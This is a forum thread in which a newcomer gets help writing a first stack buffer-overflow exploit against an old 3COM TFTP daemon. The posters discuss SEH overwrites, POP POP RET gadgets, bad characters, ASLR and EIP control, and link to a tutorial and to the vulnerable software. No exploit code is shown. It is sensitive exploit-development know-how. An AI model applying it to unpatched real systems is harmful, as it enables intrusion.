First Time Writing a BoF Exploit (Stuck)

[Lincoln]

Here is an easy to read pdf from muts about SEH: http://www.remote-exploit.org/adviso...lobalscape.pdf

[oib111]

Thanks, that's just what I needed. Uh, just a little question, it seems like the 0x00 might be a bad character, but since the other POP POP RET I found that started with 0x77 was in ntdll, so of course...ASLR. Is there anyway to bypass ASLR? If not..uh do I just keep trying to exploit it over and over until it works lol?

[lupin]

Quote:

Originally Posted by oib111

Now, if the problem persists, it is possible that 0xEB is a bad character, right?

I suppose its possible, although I dont recall having had \0xeb as a bad character myself. You can confirm using the method I specified above (try sending buffers that are otherwise identical except that one contains \0xeb instead of something like \x41, and confirm that EIP gets overwritten with an identical value each time).

Quote:

Originally Posted by oib111

I don't know much about SEH, but I feel like that 0x0feb9090 as the pointer to the next SEH record is causing some problems.

The SEH address is used as an exception handler when a program crashes - execution jumps to that address, which usually points to a function that throws up an error message and closes the program.

If you were to trigger an EIP overwrite in Ollydbg, with EIP being overwritten with something like 42424242, and then you pass that exception to the program, the SEH handler should be called next. In this case the SEH value would matter. However, if you are using an EIP overwrite to redirect execution however, with the EIP value set to a valid address that contains valid commands for the CPU to run, then the SEH shouldnt get called.

[oib111]

Oh ok, so I don't have to worry about SEH at all. Also, since 0x00 is a bad character and Windows 7 implements ASLR, how exactly can I jump to the POP POP RET in ntdll? Is there any way to bypass ASLR?

[lupin]

Quote:

Originally Posted by oib111

Oh ok, so I don't have to worry about SEH at all.

If you can manage to overwrite it you can use it to help make your exploit more stable (if the EIP overwrite crashes the program instead of redirecting execution for example), but no, you dont HAVE to worry about it if the EIP overwrite works.

Quote:

Originally Posted by oib111

Also, since 0x00 is a bad character and Windows 7 implements ASLR, how exactly can I jump to the POP POP RET in ntdll? Is there any way to bypass ASLR?

I havent had to deal with ASLR myself as yet, so I can't really advise on that. Are you sure you cant find a POP POP RET anywhere else? And you cant try this on Windows XP instead? You probably want to keep things as simple as you can for your first overwrite...

[oib111]

Well it seems that the POP POP RETs that don't start with 0x00 are in DLLs so ASLR will always be a problem there. I might do some googling on ASLR bypass, but if not I will just do this on XP.

EDIT:

Trying this on XP but I'm having some problems.



I think I'm overwriting the pointer to next SEH record or the SEH handler or something and so it jumps to a random place in the program and can't fix the exception, hence the "Debugged program was unable to process exception."

[lupin]

Quote:

Originally Posted by oib111

Trying this on XP but I'm having some problems.

I think I'm overwriting the pointer to next SEH record or the SEH handler or something and so it jumps to a random place in the program and can't fix the exception, hence the "Debugged program was unable to process exception."

Does that happen when you are feeding the program a simple buffer of all '\x41'?

[oib111]

No because then the EIP isn't valid and it just crashes.

[lupin]

Quote:

Originally Posted by oib111

No because then the EIP isn't valid and it just crashes.

Can you overwrite EIP with a value you can control? If you can control EIP, then the value of SEH doesn't matter.

What particular piece of 3COM software are you using for this and how are you triggering the overflow? Download link? I may try and reproduce myself if I have a spare moment, because Ive been keen to do another buffer overflow for a while but haven't found a good candidate...

[oib111]

Here's a download link: https://www.securinfos.info/old_soft...aemon_2r10.exe

Also, if I overwrite EIP with a valid return address that happens (what's in the picture).